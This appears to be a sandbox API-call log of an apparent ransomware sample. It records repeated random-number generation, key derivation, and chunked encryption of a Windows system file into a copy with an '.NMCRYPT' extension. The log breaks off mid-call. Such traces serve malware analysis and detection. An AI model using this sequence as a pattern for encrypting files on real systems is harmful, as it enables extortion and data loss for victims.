CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.980] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.981] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.981] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0160.981] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.981] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0160.981] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.981] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.981] wcslen (_String="\\\\?\\") returned 0x4 [0160.981] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0160.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.982] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0160.982] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.982] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.983] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.984] GetLastError () returned 0x0 [0160.984] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.050] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.051] GetLastError () returned 0x0 [0161.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.051] GetLastError () returned 0x0 [0161.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.051] GetLastError () returned 0x0 [0161.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.051] GetLastError () returned 0x0 [0161.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.051] GetLastError () returned 0x0 [0161.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.051] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.051] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.052] GetLastError () returned 0x0 [0161.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.052] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.052] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, 